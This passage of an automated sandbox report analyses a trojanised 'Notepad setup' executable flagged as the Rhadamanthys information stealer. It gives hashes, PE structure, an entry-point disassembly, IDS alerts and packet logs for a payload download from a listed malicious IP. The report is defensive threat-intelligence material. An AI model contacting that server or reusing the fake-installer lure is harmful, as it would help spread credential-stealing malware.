              https://support.google.com/chrome?p=update_errorFix | rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-Agentcurl/5.9Sec-Websocket-KeySec-Webs | rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
              https://support.google.com/chrome?p=update_error | rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://support.google.com/chrome/answer/6315198?product= | rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.320753776.0000025AA39CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://support.google.com/installer/?product= | rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
164.90.172.224 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                    Analysis ID:783578
                                    Start date and time:2023-01-13 05:11:07 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Notteppad_SettupX32iX64.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@4/1@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 18.2% (good quality ratio 10%)
                                    • Quality average: 42.4%
                                    • Quality standard deviation: 42.4%
                                    HCA Information:
                                    • Successful, ratio: 79%
                                    • Number of executed functions: 112
                                    • Number of non-executed functions: 162
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240s for rundll32
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    No simulations
                                    Process:C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                    Category:dropped
                                    Size (bytes):81920
                                    Entropy (8bit):6.066489498200273
                                    Encrypted:false
                                    SSDEEP:1536:hSmNiRex5J/UB9FIFzinjXkdh4HMJH8qvxTxIwIMNE24HwFLtNIQQrUv:4mNiReJS9FIFzinLEqsGQewvLfFLMQ7
                                    MD5:EE5CE27B1160EBA615DD590C956C5807
                                    SHA1:ADD975E60E08D2669126E772932CDF12DE82348E
                                    SHA-256:47B6EB2CC7AF1DC14FA0AA25A23ADAA9109F97B9ED9376BEE1589D7A4D09E8B4
                                    SHA-512:951E2D4FBD4B95FC3D19A49FE4356C7E6C77BCE5FAE8E023E8E7ECA185C784EE842E2387A96A747FE803A7D84B16DBBCD1512BE84ED475B882447D65A051A4A5
                                    Malicious:false
                                    Reputation:low
                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                    Entropy (8bit):7.036265349775287
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • VXD Driver (31/22) 0.00%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Notteppad_SettupX32iX64.exe
                                    File size:292381
                                    MD5:e7dfb892dbd65b0ed6fed69b20edf739
                                    SHA1:1cc4b53dcd7add65fe4b11531751b43f2d7e387d
                                    SHA256:2a4637eeb74d47ddbe7ff10f005806bce77ee877b9ae52f55bf6ae425cc3fcd5
                                    SHA512:d60efd3e1d0472056c6974599582595eb9b774a04ef764e6f98cfa042095e10d57c0f994383e9bd76b8a1292d72296546f15f725abf0c3487f1daad42e5b26eb
                                    SSDEEP:6144:x6b/9DJpBnx85mwif0odtTZGbpYByPT7lyvIcySIvF68fx6:Q/9dpBnzwYTvByPHly5VIvk8J6
                                    TLSH:3354E194F66748B5C5072670457BABBFA1206F861E31C6A2FB567697FC33A1218C0FC2
                                    Icon Hash:a0e8f8fa8ac8c9d0
                                    Entrypoint:0x4012f0
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                    TLS Callbacks:0x407d70, 0x407d20
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:d3166f552368323ac64b9f36c4fbe050
                                    Instruction
                                    sub esp, 1Ch
                                    mov dword ptr [esp], 00000002h
                                    call dword ptr [00428300h]
                                    call 00007F1000A35E20h
                                    lea esi, dword ptr [esi+00000000h]
                                    lea esi, dword ptr [esi+00h]
                                    jmp dword ptr [00428334h]
                                    lea esi, dword ptr [esi+00000000h]
                                    lea esi, dword ptr [esi+00h]
                                    jmp dword ptr [00428324h]
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 18h
                                    mov dword ptr [esp], 00401350h
                                    call 00007F1000A35F53h
                                    leave
                                    ret
                                    lea esi, dword ptr [esi+00000000h]
                                    lea esi, dword ptr [esi+00h]
                                    nop
                                    ret
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    nop
                                    retn 0004h
                                    push ebx
                                    mov ecx, dword ptr [esp+08h]
                                    mov eax, dword ptr [esp+0Ch]
                                    mov edx, dword ptr [esp+10h]
                                    cmp dword ptr [ecx], 466D654Dh
                                    jne 00007F1000A35FD3h
                                    cmp edx, 01h
                                    je 00007F1000A35FA3h
                                    cmp edx, 02h
                                    je 00007F1000A35FB4h
                                    mov ebx, FFFFFFFFh
                                    test edx, edx
                                    je 00007F1000A35F86h
                                    mov eax, ebx
                                    pop ebx
                                    ret
                                    mov edx, dword ptr [ecx+20h]
                                    cmp dword ptr [edx+04h], eax
                                    jl 00007F1000A35FBBh
                                    mov dword ptr [ecx+04h], eax
                                    mov ebx, eax
                                    jmp 00007F1000A35F6Fh
                                    add eax, dword ptr [ecx+04h]
                                    mov ebx, eax
                                    mov edx, dword ptr [ecx+20h]
                                    cmp dword ptr [edx+04h], eax
                                    jl 00007F1000A35FAEh
                                    test eax, eax
                                    js 00007F1000A35FAAh
                                    mov dword ptr [ecx+04h], eax
                                    jmp 00007F1000A35F59h
                                    mov edx, dword ptr [ecx+20h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x28000 | 0xa74 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2b000 | 0x21420 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2a004 | 0x18 | .tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2822c | 0x18c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9444 | 0x9600 | False | 0.5655208333333334 | data | 6.19314855111866 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x19fd4 | 0x1a000 | False | 0.9993990384615384 | data | 7.997624625930162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x25000 | 0x930 | 0xa00 | False | 0.22890625 | data | 5.198906880552819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
/4 | 0x26000 | 0xa3c | 0xc00 | False | 0.3453776041666667 | data | 4.390264532350667 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x27000 | 0x68 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x28000 | 0xa74 | 0xc00 | False | 0.3841145833333333 | data | 4.7435808103945485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x29000 | 0x18 | 0x200 | False | 0.04296875 | data | 0.11446338125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x2a000 | 0x20 | 0x200 | False | 0.05859375 | data | 0.22482003450968063 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2b000 | 0x21420 | 0x21600 | False | 0.5701881437265918 | data | 5.98713502681655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2b1f0 | 0xc7ba | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x379b0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States
RT_ICON | 0x481d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x4a780 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x4b828 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_GROUP_ICON | 0x4bc90 | 0x4c | data | English | United States
RT_VERSION | 0x4bce0 | 0x29c | data | English | United States
RT_MANIFEST | 0x4bf80 | 0x48f | XML 1.0 document, ASCII text | |
DLL | Import
ADVAPI32.DLL | CryptEncrypt, CryptGenRandom, CryptSignHashW
GDI32.dll | CreateBrushIndirect, CreateFontIndirectW, DeleteObject, GetDeviceCaps, SelectObject, SetBkColor, SetBkMode, SetTextColor
KERNEL32.dll | CreateEventW, DeleteCriticalSection, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileA, FindNextFileA, FreeLibrary, GetCommandLineA, GetLastError, GetModuleFileNameA, GetModuleHandleW, GetProcessHeap, GetTickCount, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, InitializeCriticalSection, LeaveCriticalSection, LoadLibraryW, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject
msvcrt.dll | _close, _open, _read, _strdup, _stricoll
msvcrt.dll | __getmainargs, __mb_cur_max, __p__environ, __p__fmode, __p__pgmptr, __set_app_type, _assert, _cexit, _errno, _fpreset, _fullpath, _iob, _isctype, _msize, _onexit, _pctype, _setmode, abort, atexit, calloc, exp, fclose, fopen, fprintf, fread, fwrite, log, malloc, mbstowcs, memcpy, memmove, memset, setlocale, signal, sqrt, strcoll, strlen, strtod, tolower, vfprintf, wcstombs, free, realloc
RPCRT4.dll | RpcStringFreeA, UuidCreate, UuidHash, UuidToStringA
SHLWAPI.DLL | PathAppendW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/13/23-05:12:09.288311 | TCP | 2043202 | ET TROJAN Rhadamanthys Stealer - Payload Download Request | 49698 | 80 | 192.168.2.3 | 164.90.172.224
01/13/23-05:12:09.323085 | TCP | 2853001 | ETPRO TROJAN Rhadamanthys Stealer - Payload Response | 80 | 49698 | 164.90.172.224 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 13, 2023 05:12:09.384277105 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384399891 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384418011 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.384438992 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384494066 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384501934 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.384501934 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.384543896 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384640932 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384718895 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384784937 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.384799957 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384867907 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.384942055 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.384962082 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385082006 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385179996 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.385200024 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385219097 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.385561943 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385600090 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385679960 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385721922 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385799885 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385812998 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.385812998 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.385883093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385921001 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.385958910 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.386017084 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.386029005 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.386048079 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.386069059 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.386089087 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.386089087 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.386179924 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413177967 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413204908 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413225889 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413248062 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413269997 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413274050 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413290024 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413309097 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413327932 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413338900 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413338900 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413347960 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413367987 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413387060 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413405895 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413413048 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413413048 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413425922 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413444996 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413506031 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413507938 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413507938 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413572073 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413608074 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413630009 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413649082 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413686037 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413705111 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413722992 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413722992 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413726091 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413762093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.413779974 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.413781881 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414143085 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414164066 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.414165974 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414185047 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.414216995 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414237022 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414256096 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414278030 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.414278030 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.414289951 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414412022 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414433002 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414479971 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414494038 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.414494038 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.414499998 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414724112 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414745092 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414766073 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414786100 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.414807081 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.414807081 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.415004015 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.415421009 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.415453911 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.415468931 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.415841103 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.466284037 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.514875889 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.544795036 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544833899 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544861078 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544883966 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544908047 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544924974 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.544933081 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544951916 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544975042 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.544975042 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.544975042 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.544996977 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545021057 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545039892 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545046091 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545068026 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545090914 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545114994 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545139074 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545142889 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545142889 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545161963 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545185089 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545190096 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545208931 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545277119 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545300961 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545325041 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545347929 CET8049698164.90.172.224192.168.2.3
